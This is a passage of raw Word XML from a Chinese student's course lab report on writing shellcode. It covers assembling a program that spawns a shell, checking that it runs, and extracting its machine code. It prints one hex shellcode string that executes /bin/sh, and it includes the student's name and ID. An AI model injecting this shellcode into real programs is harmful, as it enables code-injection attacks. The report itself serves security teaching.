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DB177" w14:textId="77777777" w:rsidR="00EF7A52" w:rsidRPr="006920C9" w:rsidRDefault="00EF7A52" w:rsidP="00EF7A52">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153DD3B0" w14:textId="77777777" w:rsidR="00E54ECD" w:rsidRPr="006920C9" w:rsidRDefault="00E54ECD" w:rsidP="00EF7A52">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FEEB5EA" w14:textId="77777777" w:rsidR="00EF7A52" w:rsidRPr="006920C9" w:rsidRDefault="00E54ECD" w:rsidP="00EF7A52">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17BED299" wp14:editId="0EA204D6">
            <wp:extent cx="3771900" cy="8382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CDF1" w14:textId="77777777" w:rsidR="00EF7A52" w:rsidRPr="006920C9" w:rsidRDefault="00EF7A52" w:rsidP="00EF7A52">
      <w:pPr>
        <w:ind w:firstLine="880"/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14:paraId="2EFAA33F" w14:textId="4FA218A1" w:rsidR="00EF7A52" w:rsidRPr="006920C9" w:rsidRDefault="00EF7A52" w:rsidP="00420985">
      <w:pPr>
        <w:ind w:firstLine="960"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>课程实践报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60557EE0" w14:textId="77777777" w:rsidR="00031F1A" w:rsidRPr="006920C9" w:rsidRDefault="00031F1A" w:rsidP="00FA0F0C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F07B7C0" w14:textId="43AFF04A" w:rsidR="00E54ECD" w:rsidRPr="006920C9" w:rsidRDefault="00E54ECD" w:rsidP="00420985">
      <w:pPr>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A043A1" wp14:editId="374F790A">
            <wp:extent cx="1858746" cy="1741714"/>
            <wp:effectExtent l="0" t="0" r="825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82" cy="1745964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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66214D8A" w14:textId="5390904F" w:rsidR="00EF7A52" w:rsidRDefault="00EF7A52" w:rsidP="00420985">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="2751" w:hangingChars="175" w:hanging="1474"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r w:rsidRPr="0079701F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:fitText w:val="1124" w:id="2084425472"/>
        </w:rPr>
        <w:t>课</w:t>
      </w:r>
      <w:r w:rsidRPr="0079701F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:fitText w:val="1124" w:id="2084425472"/>
        </w:rPr>
        <w:t>程</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:r w:rsidR="00D6541F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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:r w:rsidR="00046E25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</w:t>
      </w:r>
      <w:r w:rsidR="00EC5739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>网络</w:t>
      </w:r>
      <w:r w:rsidR="00DC5FF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>攻防</w:t>
      </w:r>
      <w:r w:rsidR="00EC5739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>技术</w:t>
      </w:r>
      <w:r w:rsidR="00EC5739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>(</w:t>
      </w:r>
      <w:r w:rsidR="003C26AF" w:rsidRPr="003C26AF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>314006040</w:t>
      </w:r>
      <w:r w:rsidR="00EC5739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>)</w:t>
      </w:r>
      <w:r w:rsidR="0067799B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</w:t>
      </w:r>
      <w:r w:rsidR="00561231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</w:t>
      </w:r>
      <w:r w:rsidR="0067799B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</w:t>
      </w:r>
      <w:r w:rsidR="00276139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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFAE4A4" w14:textId="05B06ADC" w:rsidR="0079701F" w:rsidRPr="006920C9" w:rsidRDefault="0079701F" w:rsidP="0079701F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="1767" w:hangingChars="175" w:hanging="490"/>
        <w:jc w:val="left"/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>课</w:t>
      </w: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>序</w:t>
      </w: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>号</w:t>
      </w:r>
      <w:r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  </w:t>
      </w:r>
      <w:r w:rsidR="001B186A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</w:t>
      </w:r>
      <w:r w:rsidR="001B186A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</w:t>
      </w:r>
      <w:r w:rsidR="000B0E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="001B186A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3              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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A88CAA" w14:textId="4A40875C" w:rsidR="00EF7A52" w:rsidRPr="006920C9" w:rsidRDefault="001B1721" w:rsidP="00420985">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="1767" w:hangingChars="175" w:hanging="490"/>
        <w:jc w:val="left"/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>作业名称</w:t>
      </w:r>
      <w:r w:rsidR="00EF7A52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</w:t>
      </w:r>
      <w:r w:rsidR="00BB2B1F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</w:t>
      </w:r>
      <w:r w:rsidR="008D0DA3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</w:t>
      </w:r>
      <w:r w:rsidR="00E90330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</w:t>
      </w:r>
      <w:r w:rsidR="00FA60F9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</w:t>
      </w:r>
      <w:r w:rsidR="000B0E54" w:rsidRPr="000B0E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidR="000B0E54" w:rsidRPr="000B0E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>编写实验</w:t>
      </w:r>
      <w:r w:rsidR="00FA60F9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</w:t>
      </w:r>
      <w:r w:rsidR="00FA60F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</w:t>
      </w:r>
      <w:r w:rsidR="00FA60F9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</w:t>
      </w:r>
      <w:r w:rsidR="00EC5739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       </w:t>
      </w:r>
      <w:r w:rsidR="008D0DA3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</w:t>
      </w:r>
      <w:r w:rsidR="00D37A9C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</w:t>
      </w:r>
      <w:r w:rsidR="0067799B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</w:t>
      </w:r>
      <w:r w:rsidR="00D37A9C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B290DF5" w14:textId="3AFFBF4C" w:rsidR="00EF7A52" w:rsidRPr="006920C9" w:rsidRDefault="00EF7A52" w:rsidP="00420985">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="2751" w:hangingChars="175" w:hanging="1474"/>
        <w:jc w:val="lef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1B186A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:fitText w:val="1124" w:id="2084425728"/>
        </w:rPr>
        <w:t>评</w:t>
      </w:r>
      <w:r w:rsidRPr="001B186A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:fitText w:val="1124" w:id="2084425728"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r w:rsidR="00276139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</w:t>
      </w:r>
      <w:r w:rsidR="005C15CA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</w:t>
      </w:r>
      <w:r w:rsidR="00BB2B1F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</w:t>
      </w:r>
      <w:r w:rsidR="005C15CA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</w:t>
      </w:r>
      <w:r w:rsidR="00276139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</w:t>
      </w:r>
      <w:r w:rsidR="002B2EA3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               </w:t>
      </w:r>
      <w:r w:rsidR="0067799B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</w:t>
      </w:r>
      <w:r w:rsidR="002B2EA3"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796D068B" w14:textId="176A30CD" w:rsidR="00EF7A52" w:rsidRDefault="00D8424D" w:rsidP="00420985">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="2751" w:hangingChars="175" w:hanging="1474"/>
        <w:jc w:val="lef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920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="281"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:fitText w:val="1124" w:id="2084425729"/>
        </w:rPr>
        <w:t>姓</w:t>
      </w:r>
      <w:r w:rsidRPr="006920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:fitText w:val="1124" w:id="2084425729"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r w:rsidR="00EF7A52" w:rsidRPr="006920C9"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 </w:t>
      </w:r>
      <w:r w:rsidR="005C15CA" w:rsidRPr="006920C9"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</w:t>
      </w:r>
      <w:r w:rsidR="00677BE0" w:rsidRPr="006920C9"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</w:t>
      </w:r>
      <w:r w:rsidR="000B0E54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>邓嘉怡</w:t>
      </w:r>
      <w:r w:rsidR="00677BE0" w:rsidRPr="006920C9"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   </w:t>
      </w:r>
      <w:r w:rsidRPr="006920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学号</w:t>
      </w:r>
      <w:r w:rsidR="00DD5769" w:rsidRPr="006920C9"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</w:t>
      </w:r>
      <w:r w:rsidR="005C15CA" w:rsidRPr="006920C9"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</w:t>
      </w:r>
      <w:r w:rsidR="00677BE0" w:rsidRPr="006920C9"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  </w:t>
      </w:r>
      <w:r w:rsidR="000B0E54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>2022141530010</w:t>
      </w:r>
      <w:r w:rsidR="00677BE0" w:rsidRPr="006920C9"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          </w:t>
      </w:r>
      <w:r w:rsidR="005C15CA" w:rsidRPr="006920C9"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</w:t>
      </w:r>
      <w:r w:rsidR="00BB2B1F" w:rsidRPr="006920C9"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59F784" w14:textId="01AA2B2F" w:rsidR="001B186A" w:rsidRPr="006920C9" w:rsidRDefault="001B186A" w:rsidP="001B186A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="1767" w:hangingChars="175" w:hanging="490"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single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>评阅意见</w:t>
      </w:r>
      <w:r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                            </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk81317906"/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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="77A98ECA" w14:textId="2BF29F0C" w:rsidR="001B186A" w:rsidRPr="006920C9" w:rsidRDefault="001B186A" w:rsidP="001B186A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="1767" w:hangingChars="175" w:hanging="490"/>
        <w:jc w:val="lef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                            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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446588C" w14:textId="77777777" w:rsidR="001B186A" w:rsidRPr="006920C9" w:rsidRDefault="001B186A" w:rsidP="001B186A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="1767" w:hangingChars="175" w:hanging="490"/>
        <w:jc w:val="lef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                            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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507F49A" w14:textId="77777777" w:rsidR="001B186A" w:rsidRPr="006920C9" w:rsidRDefault="001B186A" w:rsidP="001B186A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:leftChars="532" w:left="1767" w:hangingChars="175" w:hanging="490"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r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                            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</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:r w:rsidRPr="006920C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F043B" w14:textId="0921FEAE" w:rsidR="00523BBA" w:rsidRPr="006920C9" w:rsidRDefault="00523BBA">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006920C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12054C" w14:textId="13A796DF" w:rsidR="007D4318" w:rsidRDefault="002929DE" w:rsidP="007D4318">
      <w:pPr>
        <w:pStyle w:val="1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作业题目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2597C0" w14:textId="26150163" w:rsidR="007D4318" w:rsidRPr="007D4318" w:rsidRDefault="007D4318" w:rsidP="007D4318">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4318">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode，但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验室的目的是帮助学生理解这些技术，以便他们能够编写自己的shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563BA2F9" w14:textId="77777777" w:rsidR="007D4318" w:rsidRPr="007D4318" w:rsidRDefault="007D4318" w:rsidP="007D4318">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4318">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
      <w:r w:rsidRPr="007D4318">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>shellcode有几个挑战，一个是确保二进制文件中没有0x00，另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决，有几种方法可以解决它。第二个挑战的解决方案导致了编写外壳代码的两种典型方法。在一种方法中，数据在执行期间被推入堆栈，因此可以从堆栈指针获得它们的地址。在第二种方法中，数据存储在代码区域中，就在调用指令之后，因此在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D4318">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>调用调用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4318">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">函数时，其地址被推入堆栈（作为返回地址）。两种解决方案都非常优雅，我们希望学生能够学习这两种技术。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CC4061" w14:textId="77777777" w:rsidR="007D4318" w:rsidRPr="007D4318" w:rsidRDefault="007D4318" w:rsidP="007D4318">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60543D2D" w14:textId="4ECF6685" w:rsidR="007D4318" w:rsidRDefault="00344CD1" w:rsidP="007D4318">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤及结果</w:t>
      </w:r>
      <w:r w:rsidR="007D4318">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="007D4318" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007D4318" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008F1F81" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.a</w:t>
      </w:r>
      <w:r w:rsidR="007D4318" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：写shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0ED19F" w14:textId="448A6560" w:rsidR="007D4318" w:rsidRDefault="00F3572E" w:rsidP="007D4318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mysh.s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并得到二进制文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F3572E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5FE2C7" wp14:editId="558BAA08">
            <wp:extent cx="4543458" cy="295277"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="859383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832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29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1A93" w14:textId="3508979E" w:rsidR="00F3572E" w:rsidRDefault="00F3572E" w:rsidP="007D4318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执行二进制文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前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和运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后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不相同，证明我们通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动了一个新的shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00591985" w:rsidRPr="00591985">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25AD5DAB" wp14:editId="06EF37BA">
            <wp:extent cx="3200423" cy="1047758"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="330862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62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23" cy="10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B26D" w14:textId="0E176C35" w:rsidR="00591985" w:rsidRDefault="006D0FE0" w:rsidP="007D4318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获取机器码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E76208" w:rsidRPr="00E76208">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339EF795" wp14:editId="748CF028">
            <wp:extent cx="4829210" cy="2705120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1486353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53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210" cy="27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A34" w14:textId="7808A3B6" w:rsidR="000B1EA9" w:rsidRDefault="000B1EA9" w:rsidP="004C7C21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查看二进制文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005E3462" w:rsidRPr="005E3462">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB7A83F" wp14:editId="7FBE60F5">
            <wp:extent cx="4362482" cy="3057547"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="45184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4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82" cy="30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462">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004C7C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>截取：</w:t>
      </w:r>
      <w:r w:rsidR="004C7C21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>31c050682f2f7368682f62696e89e3505389e131d231c0b00bcd80</w:t>
      </w:r>
      <w:r w:rsidR="00F81873">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F81873">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制到convert.py中</w:t>
      </w:r>
      <w:r w:rsidR="00F81873">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F81873" w:rsidRPr="00F81873">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7D7526" wp14:editId="2E0432B5">
            <wp:extent cx="4848260" cy="3667152"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1383549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494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60" cy="366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0032" w14:textId="61811D05" w:rsidR="00ED7203" w:rsidRDefault="00ED7203" w:rsidP="004C7C21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执行convert.py，得到包含16进制机器码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00ED7203">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B9D3DF4" wp14:editId="4A5E8611">
            <wp:extent cx="4610134" cy="981082"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2032714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14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34" cy="9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6BF6" w14:textId="6EF2B5A1" w:rsidR="00BA759C" w:rsidRPr="00CC3247" w:rsidRDefault="00BA759C" w:rsidP="00BA759C">
      <w:pPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00106D55" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
